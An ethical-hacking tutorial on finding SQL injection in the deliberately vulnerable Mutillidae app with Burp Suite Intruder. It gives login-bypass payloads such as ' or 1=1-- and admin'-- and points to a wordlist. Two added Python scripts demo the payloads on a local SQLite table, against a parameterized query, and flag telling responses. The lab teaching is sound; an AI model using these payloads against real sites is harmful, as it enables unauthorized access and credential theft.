Web applications are becoming more and more popular and are replacing traditional desktop applications at a rapid pace. With all these new apps on the web come the security implications of being connected to the internet, where anyone can poke and prod at them. One of the simplest, yet most common, types of security bug found in modern web apps is SQL injection.
A typical web app does not store its data in the app itself but talks to a backend database where the data lives. That communication happens through SQL queries: the application sends a statement to the database, and the database returns the requested information to the application.
What is SQL injection?
SQL injection is a technique for attacking applications that use a database by sending input that the application incorporates into a SQL statement, with the intent of reading or modifying information the attacker should not have access to. The vulnerability exists for a number of reasons, including building queries from untrusted input by string concatenation and incorrect input filtering and sanitization.
This type of attack can retrieve sensitive information, modify existing data or even destroy entire databases. The most common attack vector for SQL injection is input fields: login forms, search forms, text boxes and file upload functions are all good candidates for testing.
In this guide, our target will be Mutillidae, a deliberately vulnerable web app included in Metasploitable 2, a deliberately vulnerable Linux virtual machine (VM) designed for testing and practice. Metasploitable 2 and Kali, the attacking machine, will be connected to an isolated network.
Step 1: Install a virtual machine with Metasploitable 2
Burp Suite is a popular tool for testing web apps for vulnerabilities, including automating parts of that testing, and it is conveniently included in Kali. Before we get to it, we need to set up our target machine.
I will use Metasploitable 2 in this guide, which you can download from Rapid7's website, but any vulnerable virtual machine will do. Installing it is like installing any other virtual machine on your computer, and Null Byte has guides that can help you get your virtual lab set up.
One thing to be careful of when using a deliberately vulnerable machine is not to expose it to hostile networks. Unless the host is completely disconnected from the internet, put the VM on a NAT or host-only network so that nothing outside the lab can reach it.
When everything is set up, log in to Metasploitable 2 (both the username and the password are msfadmin) and find its IP address with ifconfig. What you are looking for under eth0 is the "inet" address, which will be the target IP for the rest of this guide.
Step 2: Open Mutillidae in your attack browser
After finding the IP address of Metasploitable 2, browse to it to reach the web server. I use Firefox in Kali for this.
Click on “Mutillidae” to open the web app and then navigate to “OWASP Top 10”. Now select “Injection (SQL)” followed by “Extract Data” and then “User Info.” You will be greeted with a login screen.
Step 3: Configure your Burp Suite attack browser
Next, we need to configure the browser to work with Burp Suite as it acts as a proxy to capture and modify requests. I use Firefox here, but most browsers will be similar.
Open your browser's "Settings", click "Advanced" and then the "Network" tab. Select "Settings" next to Connection, make sure "Manual proxy configuration" is selected and enter 127.0.0.1 as the HTTP Proxy and 8080 as the Port. Then tick "Use this proxy server for all protocols", make sure nothing is listed under "No proxy for" and click "OK". We are now ready to launch Burp Suite.
Step 4: Intercept the request with Burp Suite
Open Burp Suite in Kali, start a new project, go to the "Proxy" tab and make sure "Intercept is on" is selected. This lets us hold the request coming from the web page and modify it, inserting different values to test for SQL injection. Back on the login page, enter an arbitrary username and password and submit the form; the request is now held in Burp, where you can see it raw as well as broken down into parameters, headers and even a hex view.
We are mainly interested in the username field, because that is what we will change to test for SQL injection. Click the "Action" button and then "Send to Intruder", or right-click anywhere in the request and do the same.
Step 5: Configure positions and payloads in Burp Suite
Then go to the "Intruder" tab and click on "Positions". Burp Suite automatically marks the positions where payloads are inserted when a request is sent to Intruder, but since we are only interested in the username field, clear all positions by pressing "Clear" on the right. Highlight the value of the username parameter and click "Add". We will use the attack type "Sniper", which takes a list of payloads and inserts them into the single position one at a time.
Now our position is set and we are ready to configure the payload. SQL interacts with the data in the database through statements. The SELECT statement retrieves data, so a login query might look like this:
SELECT username, password FROM users WHERE username='myname' AND password='mypassword';
Let's look at the classic SQL injection payload ' or 1=1-- (note the trailing space after the dashes: on MySQL, the database behind Mutillidae, -- is only treated as a comment when it is followed by whitespace). This is what the statement looks like when the payload is entered in the username field:
SELECT username, password FROM users WHERE username='' or 1=1-- ' AND password='';
The payload's single quote closes the string literal, leaving an empty username; 1=1 always evaluates to true, so the WHERE clause now reads "empty OR true". The double dash comments out the rest of the statement, so the password check is never evaluated. Because "empty OR true" is true for every row, the database returns the account data.
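To make the effect of each payload concrete, here is an added example that is not code from the page or from Mutillidae. It reproduces the login query above against an in-memory SQLite table (the users table, the sample accounts and the payload list are all constructed for the demo), runs a handful of payloads through the username position the way the Sniper attack does, and contrasts the concatenated query with a parameterized one. SQLite accepts a bare -- comment, so the trailing space matters only when you move the payloads to MySQL.

```python
"""Added example (not code from the page or from Mutillidae): the login query
discussed above, reproduced against an in-memory SQLite table so the effect
of each payload can be observed directly."""
import sqlite3

# Constructed sample accounts; names and passwords are made up for the demo.
SAMPLE_USERS = [
    ("admin", "adminpass"),
    ("alice", "wonderland"),
    ("bob", "builder"),
]

# Payloads tried in the username position, in the spirit of Intruder's sniper
# attack. SQLite accepts a bare "--" comment; on MySQL keep the trailing space.
PAYLOADS = [
    "' or 1=1-- ",    # closes the literal, forces true, comments out the password check
    "' or '1'='1",    # true, but AND binds tighter than OR, so it also needs the password field
    "admin'-- ",      # targets one account by name and drops the password check
    "'",              # unbalanced quote: breaks the query and produces a SQL error
    "admin",          # a normal, non-malicious value for comparison
]


def make_db() -> sqlite3.Connection:
    """Creates the users table the sample login query selects from."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_query(username: str, password: str) -> str:
    """Builds the statement by string concatenation: the defect SQL injection relies on."""
    return (
        "SELECT username, password FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Runs the concatenated query and returns every row it matches."""
    return conn.execute(vulnerable_query(username, password)).fetchall()


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Same query with bound parameters: the input is data and can never become SQL."""
    return conn.execute(
        "SELECT username, password FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchall()


def try_payloads(conn, payloads, login_fn, password="wrongpass"):
    """Tries each payload in the username field with a wrong password and records
    the number of rows returned, or the error text if the query failed.

    Burp surfaces the same signal as a response with a different length or
    status code; here we can count rows directly."""
    results = {}
    for payload in payloads:
        try:
            results[payload] = len(login_fn(conn, payload, password))
        except sqlite3.Error as exc:
            results[payload] = f"error: {exc}"
    return results


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query("' or 1=1-- ", "wrongpass"))
    for name, fn in (("vulnerable", vulnerable_login), ("parameterized", safe_login)):
        print(f"--- {name} ---")
        for payload, outcome in try_payloads(db, PAYLOADS, fn).items():
            print(f"{payload!r:20} -> {outcome}")
```

Two details worth noticing when you run it: the second payload returns nothing on its own because AND binds tighter than OR, which is why that variant is normally entered in both the username and the password field; and the lone quote produces a database error rather than rows, which in Burp shows up as a different status code or response length and is just as useful a signal as a successful bypass. Against the parameterized query every payload returns zero rows and no errors.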
Click on the "Payloads" tab and go to "Payload Options"; the default settings are fine for now, including the payload encoding at the bottom of the tab, which URL-encodes characters such as ' and = so they survive in the request. Here we enter our payloads as a simple list, either one at a time or by loading an existing file. Kali ships with a variety of wordlists, including one specifically for SQL injection testing. Click "Load" and navigate to /usr/share/wordlists/wfuzz/injection/SQL.txt. Now we are ready to launch our attack.
Step 6: Run an intruder attack in Burp Suite
Click the "Start attack" button and a new window opens showing the Intruder attack. Here you can follow the progress of the requests along with each payload and the status code of its response. Be patient; it can take quite a while depending on the length of the list (the Community edition also throttles Intruder).
When the attack finishes, you can view the details of each request by clicking on it.
Step 7: Analyze the results in Burp Suite
What we are looking for here is the response. In this case every request returned a 200 status code, but a successful payload will often produce a different code (a 500, for instance, when the injected characters break the query). The other usual way to tell whether a payload did something is whether the length of the response is noticeably different from the rest. I selected the request containing the payload ' or 1=1 or ''=' because I had tested this injection manually beforehand and knew it would work; note that instead of a comment it ends with ''=', so the query's own closing quote completes the final comparison.
Burp Suite is handy because you can render the page returned in the response by going to the "Response" tab and clicking "Render". We can see below that our SQL injection succeeded and that we now have a username and password. If this had been an administrative panel or similar, we could log in with the administrator's credentials and do a great deal of damage.
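Sorting hundreds of Intruder results by eye gets old quickly, so here is an added example (not from the page, and not a Burp feature) of the triage described above done over a results table. The table is a constructed sample in the same shape as Burp's payload/status/length columns; Burp's own export format and column names are not assumed. The idea is that the most common (status, length) pair is the "nothing happened" baseline, and anything that departs from it is worth opening in the Response tab.

```python
"""Added example (not from the page): flag Intruder-style results whose status
code or response length differs from the baseline response."""
from collections import Counter
import csv
import io

# Constructed sample results: tab-separated payload, status and length.
# The values and column names are made up for the demo, not a real Burp export.
SAMPLE_RESULTS = """payload\tstatus\tlength
baseline\t200\t5120
' or 1=1-- \t200\t9874
' or '1'='1\t200\t5120
'\t500\t1287
admin'-- \t200\t6010
1 or 1=1\t200\t5120
"""


def parse_results(text: str) -> list:
    """Parses a tab-separated table into (payload, status, length) tuples."""
    rows = csv.DictReader(io.StringIO(text), delimiter="\t")
    return [(r["payload"], int(r["status"]), int(r["length"])) for r in rows]


def triage(rows: list, tolerance: int = 0) -> list:
    """Returns (payload, reason) for every row that departs from the baseline.

    The baseline is the most common (status, length) pair, i.e. the response
    the application gives when the payload did nothing. `tolerance` allows
    small length differences on pages with dynamic content (timestamps, nonces)."""
    (base_status, base_len), _ = Counter(
        (status, length) for _, status, length in rows
    ).most_common(1)[0]
    flagged = []
    for payload, status, length in rows:
        if status != base_status:
            flagged.append((payload, f"status {status} != {base_status}"))
        elif abs(length - base_len) > tolerance:
            flagged.append((payload, f"length {length} != {base_len}"))
    return flagged


if __name__ == "__main__":
    for payload, reason in triage(parse_results(SAMPLE_RESULTS)):
        print(f"{payload!r:20} {reason}")
```

On the sample, the two payloads that return extra rows show up as longer responses, the lone quote shows up as a 500, and the payload that fails because of AND/OR precedence is indistinguishable from the baseline, which is exactly why it would be skipped in Burp as well.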
SQL Injection in the Wild
Although SQL injection has been known as a serious vulnerability for a long time, it is still one of the most common methods of exploitation today. Part of the reason is that anyone can put together a semi-functional web app and publish it on the internet. Even professional developers often struggle to follow secure coding principles, so it is no surprise when a hobbyist ships an insecure application.
To be truly effective with SQL injection, it is best to learn SQL yourself. After all, the best way to break something is to know how it works and use that knowledge to your advantage. Once your testing has found a vulnerability and a payload that works, you can tailor the SQL to run your own queries. This is useful for discovering the layout of a table, modifying data and even enumerating other tables in the database. There is really no limit to what you can do once you have a firm grasp of SQL.
Until the day proper security becomes the highest priority, there will be SQL injection vulnerabilities in web applications. That means there will always be plenty of work for white hats, so get out there and hack away.
Do you want to start making money as a white hat hacker? Start your career with white-hat hacking with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get more than 60 hours of training from ethical hacking professionals.